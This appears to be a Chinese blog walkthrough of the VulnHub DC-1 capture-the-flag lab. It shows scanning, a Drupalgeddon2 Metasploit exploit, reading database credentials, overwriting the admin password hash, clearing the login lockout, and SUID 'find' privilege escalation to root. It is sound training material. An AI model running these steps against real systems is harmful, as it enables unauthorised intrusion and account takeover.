DC-1靶机练习【超详细】

 前言

作者简介：不知名白帽，网络安全学习者。

博客主页：https://blog.csdn.net/m0_63127854?type=blog

Vulnhuv专栏：https://blog.csdn.net/m0_63127854/category_12000843.html

网络安全交流社区：https://bbs.csdn.net/forums/angluoanquan

目录

环境

信息收集

查看kali的IP

netdiscover发现DC-1靶机IP

​编辑

nmap扫描DC-1靶机信息

​编辑

访问80端口

搜索Drupal

漏洞扫描

msf搜索相关漏洞

漏洞利用

​编辑

找到flag1

找到flag2

找到flag3

SUID提权

​编辑

找到flag4

​编辑

​编辑

找到thefinalflag.txt

---

对下载的DC-1.zip文件进行解压

VM打开DC-1.ova文件（快捷键Ctrl+O）

开启DC-1

将DC-1的网络模式换成NET模式，方便使用kali进行同网段扫描

环境

kali的IP：192.168.20.129；DC-1靶机的IP192.168.20.130

信息收集

查看kali的IP

netdiscover发现DC-1靶机IP

netdiscover -r 192.168.20.1/24

nmap扫描DC-1靶机信息

nmap -A -v -T4 192.168.20.130

访问80端口

搜索Drupal

Drupal是使用PHP语言编写的开源内容管理框架（CMF），它由内容管理系统（CMS）和PHP开发框架（Framework）共同构成，在GPL2.0及更新协议下发布

漏洞扫描

msf搜索相关漏洞

search drupal

Check中为"yes"的都可以使用

漏洞利用

使用模板二

use exploit/unix/webapp/drupal_drupalgeddon2

show options查看模板的需要配置的地方

配置RHOSTS

set rhosts 192.168.20.130
 
run

shell进入后渗透模块，使用python反弹一个交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

找到flag1

ls查看当前文件夹下的文件，找到flag1.txt

查看flag1.txt

flag1提示：每个优秀的CMS都需要一个配置文件—您也需要

Drupal的默认配置文件为 /var/www/sites/default/settings.php

找到flag2

进入sites/default/下找settings.php,在配置文件中发现flag2和一些数据库信息

通过mysql，我们查看3306端口是否开放

netstat -anptl

已经知道数据库的账号密码，而且3306端口已开放，登录数据库

mysql -u dbuser -p 

查看数据库

show databases;

查看drupaldb数据库中的表

use drupaldb;
show tables;

查看user表中的用户

select * from users;

在scripts录有password-hash.sh文件，可以用该文件生成自己的密码hash值替换数据库hash

find . -name “hash”

php scripts/password-hash.sh password

修改密码

update drupaldb.users set pass='$S$DNTdRYn.oOsIM0QzOSYWQhI7XXGqr0igs4tDhcSJgEXaGVwuCKnv' where name="admin"; ##修改密码

报错解决：

Sorry, there have been more than 5 failed login attempts for this account. It is temporarily blocked. Try again later or request a new password.

drupal的用户登录中，连续密码输入错误5次 该账号就无法再登录 ，试五遍就让你重置密码。

所以清除flood

truncate flood;

登录网站

找到flag3

Flag3提示词有perms、find、-exec、shadow共四个特殊提示词

SUID提权

cat /etc/passwd

找到flag4

使用find命令查找有特殊权限suid的命令

find / -perm -4000

 

使用find命令提权

find / -exec “/bin/bash” -p ;

cat flag4.txt

找到thefinalflag.txt